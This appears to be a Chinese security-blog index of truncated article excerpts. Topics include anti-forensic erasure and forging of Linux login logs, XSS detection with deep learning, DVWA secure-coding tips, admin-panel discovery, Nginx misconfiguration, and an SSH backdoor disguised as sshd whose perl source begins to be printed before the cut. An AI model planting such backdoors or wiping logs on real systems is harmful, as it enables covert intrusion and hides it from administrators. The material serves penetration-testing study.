0×00. 引言 擦除日志在渗透测试中是非常重要的一个阶段，这样可以更好地隐藏入侵痕迹，做到不被系统管理人员察觉，实现长期潜伏的目的。 前段时间NSA泄露的渗透测试工具中就有一款wtmp日志的擦除，非常好用，这引起了我的兴趣，于是研究了一下linux 登录相关二进制日志的文件格式，用python写了一个日志擦除，伪造的工具（末尾附源码） 0×01. Linux中与登录有关的日志及其格式分析 Linux中涉及到登录的二进制日志文件有 /var/run/utmp /var/log/wtmp /var/log/btmp /var...

一、前言 众所周知，深度学习在计算机视觉、自然语言处理、人工智能等领域取得了极大的进展，在安全领域也开始崭露头角走向了实际应用。本文中进行的实验主要以文本分类的方法，使用深度学习检测XSS攻击，由于本人是初学者，难免对算法本身的理解不够确切，所以本文尽量使用通俗简单的方式介绍算法，不会过多的讲解细节，以免误导大家。 二、数据集 安全领域的公开数据集非常的稀缺，本文提供的实验数据包含两个部分：从xssed爬取的黑样本作为正样例，有4万多条；另外提供约20万条正常的http get请求记录作为负样例，为了保证数据安全，去除了url中的host、path等信息，仅保留了payl...

0×00. 引言 在《利用系统特性伪装成一个免密登陆后门》一文中，我介绍过利用系统特性伪装成一个ssh系统后门，不过，这个后门需要新开一个端口，而本文介绍的这个后门只需要系统上开放了ssh服务就行了，不需要额外的开放端口，详情见正文 0×01. 正文 1. 后门简介 这个ssh 后门伪装成一个perl脚本，名为sshd，位于/usr/sbin/sshd , 将系统原先的sshd 移到/usr/bin下   sshd后门源码： #!/usr/bin/perl exec"/bin/sh"if(getpeername(STDIN...

背景 笔者从去年6月份开始研究IP地址，陆续踩了很多很多坑，也结识了一大批同行业的前辈。 我能说我是这个圈子里年龄最小的么…..我一直在承受我这个年纪不该有的智慧和经历。 关于IP地址的研究，此前我写过一个完整的系列，先后被未央网、雷锋网和先知社区转载。如果你想看的话，可以戳这里：反欺诈专栏 我们首次建模完成之后，迫不及待地让同事帮忙把数据提取出来，进行人工审核评估，却发现结果中有很多很多保留IP，心里哇凉哇凉的。每次和客户对接，我都花很长的时间跟对方的技术人员解释如何正确地获取来源IP地址，但是每家公司的情况都有所差别，没有一个标准方法。也有一些公司，由于相...

0x00 前言 DVWA（Damn Vulnerable Web Application）是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用，旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防范的过程。 本文将从DVWA中包含的各种漏洞来学习基本的Web安全开发中的需要注意的问题，本文旨在为Web开发中的新手提供一些安全指南，抛砖引玉，望大牛们多多指点。 0x01 SQL注入 1、使用mysql_real_escape_string函数，不要使用addslashes，mysql_esca...

前言 所谓的网站后台管理系统主要是用于对网站前台的信息管理，如文字、图片、影音、和其他日常使用文件的发布、更新、删除等操作，同时也包括会员信息、订单信息、访客信息的统计和管理等相关操作。简单来说就是对网站数据库和文件的快速操作和系统管理，方便前台内容的更新及管理。 渗透测试中得到后台的必要性： 后台能执行更多的敏感操作，如上传webshell。 通过SQL注入等拿到后台账户密码需要后台地址来登陆。 后台验证的相关安全性会更低点。 1. 常见网站后台路径 1.1  在当前网站 ...

之前在Sec-News中推荐了一个开源程序 https://github.com/yandex/gixy ，作用是来检测Nginx配置文件中存在的问题。正好Pwnhub上周的比赛也出现了一道题，包含由Nginx配置错误导致的漏洞。 所以我挑选我觉得比较有趣，而且很有可能犯错误的三个典型案例，来说说Nginx配置文件的安全。 另外，本文所涉及的三个案例，均已上线到Vulhub（https://github.com/phith0n/vulhub/tree/master/nginx/insecure-configuration ），阅读本文的同时可以自己动手测...